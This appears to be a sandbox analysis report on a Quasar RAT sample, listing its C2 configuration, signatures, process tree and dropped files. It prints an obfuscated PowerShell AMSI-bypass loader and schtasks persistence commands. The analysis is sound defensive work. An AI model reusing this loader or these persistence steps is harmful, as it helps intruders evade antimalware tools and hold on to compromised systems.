Analysis

  • max time kernel
    150s
  • max time network
    132s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-05-2024 20:59

General

  • Target

    R0X-Built.exe

  • Size

    409KB

  • MD5

    a0f5aa5764c4f66eee82f857f9f447b6

  • SHA1

    3c3a780d020cb3eb3088223443fe813abb95dccd

  • SHA256

    43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

  • SHA512

    458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

  • SSDEEP

    6144:RMX2pJAJcC0B61K6qZ1fQ57P/EwXhb4azmosb+lfXdOIFyoOOfTA3pwF:lpyJcC+uK6qZ1G8QJjbfNOSOObA3pwF

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes
  • encryption_key

    KaNwItdY6wlv5nCN4prL

  • install_name

    $srr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    1000

  • startup_key

    $srr-powershell

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 7 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 55 IoCs
  • Modifies registry class 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:624
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:332
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{11601616-c753-460c-8c7e-de51393b4dba}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4856
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:672
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:960
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:428
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1036
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:1060
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1104
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1216
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2968
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:jTGOFvyNbTTi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$JjtxoBbkNwGWul,[Parameter(Position=1)][Type]$GfmuLaEmPv)$NwixBCSexRV=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+'e'+'c'+''+'t'+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+'y'+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'T'+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+','+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+'e'+[Char](97)+''+[Char](108)+'ed'+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+'i'+''+[Char](67)+'l'+'a'+''+[Char](115)+''+[Char](115)+''+','+''+'A'+'ut'+'o'+''+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$NwixBCSexRV.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+'e'+''+'c'+''+'i'+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eB'+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+','+''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$JjtxoBbkNwGWul).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NwixBCSexRV.DefineMethod(''+'I'+'nvo'+[Char](107)+'e',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+''+[Char](72)+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+'i'+''+'g'+','+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+','+'V'+'i'+'r'+''+[Char](116)+''+'u'+''+[Char](97)+'l',$GfmuLaEmPv,$JjtxoBbkNwGWul).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'t'+[Char](105)+'m'+[Char](101)+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $NwixBCSexRV.CreateType();}$eoyyoEZgQxLWX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+''+'o'+'so'+[Char](102)+'t'+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+'ns'+[Char](97)+'f'+[Char](101)+''+'N'+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+'d'+'s'+'');$uAbgvAmxqZbdqV=$eoyyoEZgQxLWX.GetMethod(''+'G'+'e'+'t'+''+[Char](80)+''+'r'+''+[Char](111)+'cA'+'d'+''+'d'+''+[Char](114)+'e'+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+'c,'+[Char](83)+'t'+'a'+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gNSYDQkWXyaXlYSPOIZ=jTGOFvyNbTTi @([String])([IntPtr]);$gIIATMIrKoQMHntWqkKSKM=jTGOFvyNbTTi @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$hrMvwWXTPCJ=$eoyyoEZgQxLWX.GetMethod(''+[Char](71)+''+[Char](101)+'tM'+[Char](111)+'d'+[Char](117)+''+[Char](108)+'eH'+'a'+'ndle').Invoke($Null,@([Object]('ke'+[Char](114)+''+[Char](110)+'e'+[Char](108)+''+'3'+''+'2'+'.'+'d'+''+[Char](108)+''+[Char](108)+'')));$nvOwlovYLyoznp=$uAbgvAmxqZbdqV.Invoke($Null,@([Object]$hrMvwWXTPCJ,[Object](''+'L'+'o'+'a'+''+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$qsuwXiPwjvlteruAO=$uAbgvAmxqZbdqV.Invoke($Null,@([Object]$hrMvwWXTPCJ,[Object](''+[Char](86)+''+'i'+''+[Char](114)+'t'+'u'+''+'a'+'l'+[Char](80)+'r'+'o'+''+'t'+''+[Char](101)+''+[Char](99)+''+'t'+'')));$JiMzkor=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nvOwlovYLyoznp,$gNSYDQkWXyaXlYSPOIZ).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$CaEOAUAMNUONSLUhh=$uAbgvAmxqZbdqV.Invoke($Null,@([Object]$JiMzkor,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+'Sc'+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+'r')));$JbmdKehSqx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qsuwXiPwjvlteruAO,$gIIATMIrKoQMHntWqkKSKM).Invoke($CaEOAUAMNUONSLUhh,[uint32]8,4,[ref]$JbmdKehSqx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$CaEOAUAMNUONSLUhh,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qsuwXiPwjvlteruAO,$gIIATMIrKoQMHntWqkKSKM).Invoke($CaEOAUAMNUONSLUhh,[uint32]8,0x20,[ref]$JbmdKehSqx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+'W'+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+'7'+[Char](55)+'s'+[Char](116)+''+'a'+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:1848
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                        • Drops file in System32 directory
                        PID:1228
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1288
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1328
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1368
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1428
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:2656
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1492
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1500
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                      1⤵
                                        PID:1544
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1664
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1712
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1752
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1820
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1828
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1972
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1984
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:1472
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1620
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2088
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                          1⤵
                                                            PID:2100
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2216
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2336
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2516
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2524
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                    1⤵
                                                                      PID:2668
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      PID:2712
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2780
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                        1⤵
                                                                          PID:2796
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2824
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2832
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                              1⤵
                                                                                PID:2960
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:688
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                  1⤵
                                                                                    PID:3340
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                    • Suspicious use of UnmapMainImage
                                                                                    PID:3440
                                                                                    • C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"
                                                                                      2⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4388
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f
                                                                                        3⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:1732
                                                                                      • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:3456
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                          4⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:1124
                                                                                      • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:2160
                                                                                      • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                        "SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST
                                                                                        3⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:2452
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                    1⤵
                                                                                      PID:3576
                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                      1⤵
                                                                                        PID:3756
                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                        1⤵
                                                                                          PID:3908
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                            PID:3816
                                                                                          • C:\Windows\system32\SppExtComObj.exe
                                                                                            C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                            1⤵
                                                                                              PID:4540
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                              1⤵
                                                                                                PID:4692
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                1⤵
                                                                                                  PID:4840
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                  1⤵
                                                                                                    PID:4056
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                    1⤵
                                                                                                      PID:1916
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                      1⤵
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:5084
                                                                                                    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                      1⤵
                                                                                                      • Drops file in System32 directory
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:540
                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                      1⤵
                                                                                                        PID:4260
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:1248
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                          • Modifies registry class
                                                                                                          PID:3772
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:1696
                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                            1⤵
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks SCSI registry key(s)
                                                                                                            • Enumerates system info in registry
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:3948
                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:2708

                                                                                                            Network

                                                                                                            MITRE ATT&CK Matrix ATT&CK v13

                                                                                                            Execution

                                                                                                            Scheduled Task/Job

                                                                                                            1
                                                                                                            T1053

                                                                                                            Persistence

                                                                                                            Scheduled Task/Job

                                                                                                            1
                                                                                                            T1053

                                                                                                            Privilege Escalation

                                                                                                            Scheduled Task/Job

                                                                                                            1
                                                                                                            T1053

                                                                                                            Discovery

                                                                                                            Query Registry

                                                                                                            3
                                                                                                            T1012

                                                                                                            System Information Discovery

                                                                                                            3
                                                                                                            T1082

                                                                                                            Peripheral Device Discovery

                                                                                                            1
                                                                                                            T1120

                                                                                                            Command and Control

                                                                                                            Web Service

                                                                                                            1
                                                                                                            T1102

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                              Filesize

                                                                                                              338B

                                                                                                              MD5

                                                                                                              f54c2389dfeedccc9694014963e7de04

                                                                                                              SHA1

                                                                                                              bca6b202563a38271e9b1ee31d7dbf7af1371343

                                                                                                              SHA256

                                                                                                              6b25bdb4a6b6db5675376a9b6fb2b3556f832792b884f56a16e2f9d39c86282c

                                                                                                              SHA512

                                                                                                              e4687dcd2c2f8079971ec2795075b411e83d6dba947e7cc688c34348096398b04df396731bfb65803c9618c422bb65931ed96f5b2225cba61ad0e1f4aafb31f2

                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
                                                                                                              Filesize

                                                                                                              404B

                                                                                                              MD5

                                                                                                              c5d8e83d4070a40c3e119ead87bc6c75

                                                                                                              SHA1

                                                                                                              39adac89e549b29f460d8a96313cd9d39f4dbe1f

                                                                                                              SHA256

                                                                                                              481b63fbb5101951c748805e171b8cda2e572dc074a02bdcb3846143cd132f6a

                                                                                                              SHA512

                                                                                                              a47d31ef3c83d3609c4979812bb6662c7325c2fdefe876a7171373c5e0ad2c849b7cdceed70d271a96516ca86f9c3643935ec1c65b061af868a4adda2a6ab0ec

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                              Filesize

                                                                                                              162KB

                                                                                                              MD5

                                                                                                              152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                              SHA1

                                                                                                              c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                              SHA256

                                                                                                              a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                              SHA512

                                                                                                              2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                            • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                                              Filesize

                                                                                                              409KB

                                                                                                              MD5

                                                                                                              a0f5aa5764c4f66eee82f857f9f447b6

                                                                                                              SHA1

                                                                                                              3c3a780d020cb3eb3088223443fe813abb95dccd

                                                                                                              SHA256

                                                                                                              43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

                                                                                                              SHA512

                                                                                                              458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

                                                                                                            • C:\Windows\Temp\__PSScriptPolicyTest_h10sungd.x5c.ps1
                                                                                                              Filesize

                                                                                                              60B

                                                                                                              MD5

                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                              SHA1

                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                              SHA256

                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                              SHA512

                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                            • memory/332-90-0x00007FF8AA2D0000-0x00007FF8AA2E0000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/332-89-0x0000020BCDE50000-0x0000020BCDE7B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/332-83-0x0000020BCDE50000-0x0000020BCDE7B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/428-94-0x000002367D290000-0x000002367D2BB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/624-56-0x00000253202C0000-0x00000253202EB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/624-49-0x00000253202C0000-0x00000253202EB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/624-50-0x00000253202C0000-0x00000253202EB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/624-57-0x00007FF8AA2D0000-0x00007FF8AA2E0000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/624-48-0x0000025320290000-0x00000253202B5000-memory.dmp
                                                                                                              Filesize

                                                                                                              148KB

                                                                                                            • memory/672-68-0x00007FF8AA2D0000-0x00007FF8AA2E0000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/672-61-0x0000019DF32A0000-0x0000019DF32CB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/672-67-0x0000019DF32A0000-0x0000019DF32CB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/960-79-0x00007FF8AA2D0000-0x00007FF8AA2E0000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/960-72-0x0000026D16BA0000-0x0000026D16BCB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/960-78-0x0000026D16BA0000-0x0000026D16BCB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/1848-30-0x0000028054040000-0x0000028054062000-memory.dmp
                                                                                                              Filesize

                                                                                                              136KB

                                                                                                            • memory/1848-34-0x00007FF8E9DA0000-0x00007FF8E9E5E000-memory.dmp
                                                                                                              Filesize

                                                                                                              760KB

                                                                                                            • memory/1848-33-0x00007FF8EA250000-0x00007FF8EA445000-memory.dmp
                                                                                                              Filesize

                                                                                                              2.0MB

                                                                                                            • memory/1848-32-0x0000028056560000-0x000002805658A000-memory.dmp
                                                                                                              Filesize

                                                                                                              168KB

                                                                                                            • memory/3456-717-0x00000000751E0000-0x0000000075990000-memory.dmp
                                                                                                              Filesize

                                                                                                              7.7MB

                                                                                                            • memory/3456-716-0x00000000751E0000-0x0000000075990000-memory.dmp
                                                                                                              Filesize

                                                                                                              7.7MB

                                                                                                            • memory/3456-13-0x00000000751E0000-0x0000000075990000-memory.dmp
                                                                                                              Filesize

                                                                                                              7.7MB

                                                                                                            • memory/3456-14-0x00000000751E0000-0x0000000075990000-memory.dmp
                                                                                                              Filesize

                                                                                                              7.7MB

                                                                                                            • memory/3456-31-0x0000000006600000-0x000000000660A000-memory.dmp
                                                                                                              Filesize

                                                                                                              40KB

